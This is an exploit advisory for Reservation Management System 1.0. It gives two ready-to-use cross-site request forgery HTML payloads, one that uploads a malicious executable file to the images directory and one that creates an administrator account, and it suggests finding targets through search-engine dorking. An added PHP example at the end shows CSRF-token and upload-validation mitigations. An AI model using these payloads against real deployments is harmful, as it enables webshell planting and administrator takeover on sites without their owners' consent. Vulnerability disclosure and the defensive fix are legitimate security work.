Reservation Management System 1.0 Cross Site Request Forgery
=============================================================================================================================================
| # Title : Reservation Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |
=============================================================================================================================================
poc :
[+] Dorking in Google or other search engine.
[+] The following HTML code uploads an executable malicious file remotely.
[+] Line 8 : Set your target URL
[+] Save payload as poc.html
[+] Payload :
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New Menu</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Menu Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Category</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="cat" required="">
<option value="9">Dessert</option>
<option value="6">Main Course</option>
<option value="7">Pasta</option>
<option value="10">Rice</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Subcategory</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="subcat">
<option>Drinks</option>
<option>Lunch and Dinner</option>
<option>Mirienda</option>
<option>Non Combo Meal</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Description</label>
<div class="col-lg-8">
<textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Price</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Image</label>
<div class="col-lg-8">
<input type="file" class="form-control" name="image" id="title">
</div>
</div>
<!-- Buttons -->
<div class="form-group">
<!-- Buttons -->
<div class="col-lg-offset-2 col-lg-6">
<button type="submit" class="btn btn-sm btn-primary">Save</button>
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</div>
</form>
<!--end form-->
</div>
</div>
[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php
----------- [+] Part 02 Add Admin [+] -----------
[+] Line 8 : Set your target URL
[+] Save payload as poc.html
[+] Payload :
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New User</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Full Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="username">Username</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="password">Password</label>
<div class="col-lg-8">
<input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">
</div>
</div>
<!-- Buttons -->
<div class="form-group">
<!-- Buttons -->
<div class="col-lg-offset-2 col-lg-6">
<button type="submit" class="btn btn-sm btn-primary">Save</button>
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</div>
</form>
<!--end form-->
</div>
</div>
Greetings to :
==========================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
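
A server-side mitigation for both forged requests described above (the menu_save.php upload and the user_save.php account creation), as an added example that is not part of the original advisory or of the application's own code. The helper names, the hidden csrf_token form field and the ../images destination are assumptions; the application's real save logic is not shown on this page.

```php
<?php
// Added example: hypothetical guard to include at the top of state-changing
// admin endpoints such as menu_save.php and user_save.php (names are assumptions).
declare(strict_types=1);

// SameSite=Lax keeps the session cookie off cross-site POSTs (defence in depth).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Call while rendering an admin form; emit the value in a hidden "csrf_token" field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any POST lacking the per-session token; a page on another origin cannot read it.
function require_csrf(): void {
    $sent  = $_POST['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// Accept only real images and store them under a server-chosen name and extension,
// so an upload can never land in images/ as an executable script.
function store_menu_image(array $file, string $destDir): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    return move_uploaded_file($file['tmp_name'], $destDir . '/' . $name) ? $name : null;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    require_csrf();
    $saved = isset($_FILES['image']) ? store_menu_image($_FILES['image'], __DIR__ . '/../images') : null;
    // $saved is the stored file name (or null); hand it to the endpoint's existing insert logic.
}
```

Disabling script execution for the images/ directory in the web server configuration closes the same upload path even if a file slips through validation.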